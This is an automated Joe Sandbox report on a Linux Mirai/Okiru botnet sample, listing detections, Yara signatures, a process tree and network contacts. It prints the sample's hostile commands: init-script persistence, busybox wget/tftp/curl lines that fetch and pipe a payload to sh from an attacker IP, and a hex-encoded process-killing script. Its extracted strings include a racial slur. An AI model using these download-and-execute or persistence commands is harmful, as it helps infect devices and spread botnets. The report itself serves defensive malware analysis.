Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:	x86_32.nn.elf
Analysis ID:	1574229
MD5:	b6c87b436d8de600e1f8c7978a098739
SHA1:	610ffdd17efa2412f76de225cc4b33102653b85d
SHA256:	8b1aeae909258c79a17d2d0590cf857ec7713c2c5ec0e0995d9294b60e6d3e8b
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Okiru

Drops files in suspicious directories

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574229
Start date and time:	2024-12-13 06:12:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	x86_32.nn.elf
Detection:	MAL
Classification:	mal96.spre.troj.evad.linELF@0/9@0/0

Runtime Messages

Command:	/tmp/x86_32.nn.elf
PID:	6238
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

x86_32.nn.elf (PID: 6238, Parent: 6162, MD5: b6c87b436d8de600e1f8c7978a098739) Arguments: /tmp/x86_32.nn.elf

x86_32.nn.elf New Fork (PID: 6253, Parent: 6238)

sh (PID: 6253, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6260, Parent: 6253)

systemctl (PID: 6260, Parent: 6253, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

x86_32.nn.elf New Fork (PID: 6286, Parent: 6238)

sh (PID: 6286, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6287, Parent: 6286)

chmod (PID: 6287, Parent: 6286, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

x86_32.nn.elf New Fork (PID: 6288, Parent: 6238)

sh (PID: 6288, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6289, Parent: 6288)

ln (PID: 6289, Parent: 6288, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

x86_32.nn.elf New Fork (PID: 6290, Parent: 6238)

sh (PID: 6290, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

x86_32.nn.elf New Fork (PID: 6291, Parent: 6238)

sh (PID: 6291, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

sh New Fork (PID: 6292, Parent: 6291)

chmod (PID: 6292, Parent: 6291, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh

x86_32.nn.elf New Fork (PID: 6293, Parent: 6238)

sh (PID: 6293, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6294, Parent: 6293)

mkdir (PID: 6294, Parent: 6293, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

x86_32.nn.elf New Fork (PID: 6295, Parent: 6238)

sh (PID: 6295, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

sh New Fork (PID: 6296, Parent: 6295)

ln (PID: 6296, Parent: 6295, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh

x86_32.nn.elf New Fork (PID: 6297, Parent: 6238)

x86_32.nn.elf New Fork (PID: 6299, Parent: 6297)

x86_32.nn.elf New Fork (PID: 6300, Parent: 6297)

x86_32.nn.elf New Fork (PID: 6308, Parent: 6297)

x86_32.nn.elf New Fork (PID: 6311, Parent: 6297)

udisksd New Fork (PID: 6245, Parent: 799)

dumpe2fs (PID: 6245, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6271, Parent: 6269)

snapd-env-generator (PID: 6271, Parent: 6269, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6310, Parent: 799)

dumpe2fs (PID: 6310, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6396, Parent: 799)

dumpe2fs (PID: 6396, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6416, Parent: 799)

dumpe2fs (PID: 6416, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6418, Parent: 799)

dumpe2fs (PID: 6418, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x86_32.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
x86_32.nn.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
x86_32.nn.elf	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
x86_32.nn.elf	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
x86_32.nn.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
x86_32.nn.elf	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x12575:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
x86_32.nn.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd682:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
x86_32.nn.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x11591:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
x86_32.nn.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfa72:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
x86_32.nn.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd652:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6308.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6308.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x12575:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd682:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x11591:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfa72:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6308.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd652:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6297.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6297.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x12575:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd682:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x11591:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfa72:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6297.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd652:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6311.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6311.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6238.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x12575:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd682:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x11591:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfa72:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6311.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd652:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6238.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x12575:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd682:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x11591:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfa72:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6238.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd652:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Process Memory Space: x86_32.nn.elf PID: 6238	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: x86_32.nn.elf PID: 6297	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: x86_32.nn.elf PID: 6308	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: x86_32.nn.elf PID: 6311	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 39 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: x86_32.nn.elf	Virustotal: Detection: 39%			Perma Link
Source: x86_32.nn.elf	ReversingLabs: Detection: 44%

Machine Learning detection for sample

Source: x86_32.nn.elf

Joe Sandbox ML: detected

Source: x86_32.nn.elf	String: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
Source: x86_32.nn.elf	String: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Source: global traffic

TCP traffic: 192.168.2.23:60408 -> 94.156.227.234:38242

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 119.101.53.7
Source: unknown	TCP traffic detected without corresponding DNS query: 132.64.26.6
Source: unknown	TCP traffic detected without corresponding DNS query: 58.57.46.142
Source: unknown	TCP traffic detected without corresponding DNS query: 96.47.236.159
Source: unknown	TCP traffic detected without corresponding DNS query: 8.215.225.213
Source: unknown	TCP traffic detected without corresponding DNS query: 8.123.43.188
Source: unknown	TCP traffic detected without corresponding DNS query: 73.208.8.14
Source: unknown	TCP traffic detected without corresponding DNS query: 207.140.221.139
Source: unknown	TCP traffic detected without corresponding DNS query: 58.204.40.109
Source: unknown	TCP traffic detected without corresponding DNS query: 204.39.7.11
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.171.116
Source: unknown	TCP traffic detected without corresponding DNS query: 217.191.134.17
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.249.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.45.30.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.24.177.207
Source: unknown	TCP traffic detected without corresponding DNS query: 100.220.11.149
Source: unknown	TCP traffic detected without corresponding DNS query: 106.3.16.100
Source: unknown	TCP traffic detected without corresponding DNS query: 134.188.53.245
Source: unknown	TCP traffic detected without corresponding DNS query: 58.19.3.91
Source: unknown	TCP traffic detected without corresponding DNS query: 194.245.186.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.69.243.183
Source: unknown	TCP traffic detected without corresponding DNS query: 159.4.36.240
Source: unknown	TCP traffic detected without corresponding DNS query: 77.150.89.131
Source: unknown	TCP traffic detected without corresponding DNS query: 4.112.207.233
Source: unknown	TCP traffic detected without corresponding DNS query: 33.39.83.190
Source: unknown	TCP traffic detected without corresponding DNS query: 59.2.73.34
Source: unknown	TCP traffic detected without corresponding DNS query: 56.228.134.107
Source: unknown	TCP traffic detected without corresponding DNS query: 107.241.159.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.155.83.6
Source: unknown	TCP traffic detected without corresponding DNS query: 206.223.123.139
Source: unknown	TCP traffic detected without corresponding DNS query: 150.58.162.200
Source: unknown	TCP traffic detected without corresponding DNS query: 206.152.178.138
Source: unknown	TCP traffic detected without corresponding DNS query: 79.25.150.5
Source: unknown	TCP traffic detected without corresponding DNS query: 20.115.118.134
Source: unknown	TCP traffic detected without corresponding DNS query: 124.189.196.216
Source: unknown	TCP traffic detected without corresponding DNS query: 84.2.132.46
Source: unknown	TCP traffic detected without corresponding DNS query: 9.187.47.127
Source: unknown	TCP traffic detected without corresponding DNS query: 77.131.27.25
Source: unknown	TCP traffic detected without corresponding DNS query: 14.75.121.138
Source: unknown	TCP traffic detected without corresponding DNS query: 22.216.227.222
Source: unknown	TCP traffic detected without corresponding DNS query: 148.26.181.224
Source: unknown	TCP traffic detected without corresponding DNS query: 24.135.206.9
Source: unknown	TCP traffic detected without corresponding DNS query: 64.199.0.103
Source: unknown	TCP traffic detected without corresponding DNS query: 118.203.182.154
Source: unknown	TCP traffic detected without corresponding DNS query: 220.235.63.126
Source: unknown	TCP traffic detected without corresponding DNS query: 76.76.23.185
Source: unknown	TCP traffic detected without corresponding DNS query: 48.14.166.231
Source: unknown	TCP traffic detected without corresponding DNS query: 191.228.69.4
Source: unknown	TCP traffic detected without corresponding DNS query: 132.173.130.115

Source: x86_32.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.233/curl.sh
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.233/lol.sh
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
